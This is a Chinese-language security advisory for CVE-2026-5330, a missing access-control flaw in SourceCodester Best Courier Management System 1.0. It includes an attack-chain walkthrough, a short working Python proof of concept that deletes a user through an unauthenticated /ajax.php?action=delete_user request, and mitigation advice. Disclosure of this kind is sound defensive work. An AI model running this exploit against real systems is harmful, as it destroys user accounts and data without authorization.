CVE-2026-5330 CVSS 6.5 中危

CVE-2026-5330 Best Courier访问控制缺失漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5330

漏洞类型

访问控制缺失

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Best Courier Management System

漏洞概述

SourceCodester Best Courier Management System 1.0 版本中存在一个安全漏洞。该漏洞源于 /ajax.php?action=delete_user 组件中的用户删除处理功能缺乏适当的访问控制验证。攻击者可以通过操纵 ID 参数来利用此问题，导致对系统功能的未授权访问。该漏洞可被远程利用，且已有公开的利用代码，对受影响系统的完整性和可用性构成威胁。

技术细节

该漏洞属于不安全的直接对象引用（IDOR）或访问控制失效类型。在 SourceCodester Best Courier Management System 1.0 中，/ajax.php 文件负责处理 AJAX 请求。当 action 参数设置为 delete_user 时，系统预期执行删除用户的操作。然而，后端代码在执行删除逻辑之前，未验证当前会话用户的身份或权限（PR:N），也未检查请求者是否有权操作目标 ID 对应的用户资源。
攻击者可以通过向服务器发送特制的 HTTP GET 或 POST 请求，目标 URL 为 /ajax.php?action=delete_user&ID={target_user_id}。由于缺乏认证检查，任何能够访问该网络端点的攻击者都可以发送此请求。服务器端解析参数后，会直接执行数据库删除操作，导致指定 ID 的用户数据被移除。这破坏了数据的完整性（I:L）和可用性（A:L）。

攻击链分析

STEP 1

侦察

攻击者识别出目标站点正在使用 SourceCodester Best Courier Management System 1.0，并确定 /ajax.php 端点是可访问的。

STEP 2

漏洞利用

攻击者构造并发送包含恶意参数（action=delete_user&ID=目标ID）的 HTTP 请求至服务器，且无需携带任何认证凭据。

STEP 3

影响达成

服务器端接收到请求后，由于缺乏访问控制检查，直接执行删除操作，导致系统中对应的用户数据被删除或破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url, user_id):
    """
    PoC for CVE-2026-5330
    Exploits improper access control in user deletion functionality.
    """
    # The vulnerable endpoint
    url = f"{target_url}/ajax.php"
    
    # Payload parameters
    params = {
        "action": "delete_user",
        "ID": user_id
    }
    
    try:
        # Send the request without authentication headers
        response = requests.get(url, params=params, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Request sent successfully to {url}")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL and User ID to delete
    target = "http://example.com"
    uid = "1"
    exploit(target, uid)

影响范围

SourceCodester Best Courier Management System 1.0

防御指南

临时缓解措施

建议管理员暂时限制对 /ajax.php 文件的访问，仅允许可信的内部 IP 访问，或在 Web 应用防火墙（WAF）中部署规则，拦截包含 action=delete_user 且未携带有效 Session Cookie 的请求。尽快联系厂商获取安全补丁并进行代码修复。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5330
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5330
3 Details https://www.cvedetails.com/cve/CVE-2026-5330/
4 VulDB https://vuldb.com/cve/CVE-2026-5330
5 Link https://github.com/zy606/Vulnerability-Report/tree/main/Gaatitrack-Unauth-Delete
6 Link https://vuldb.com/submit/780734
7 Link https://vuldb.com/vuln/354664
8 Link https://vuldb.com/vuln/354664/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表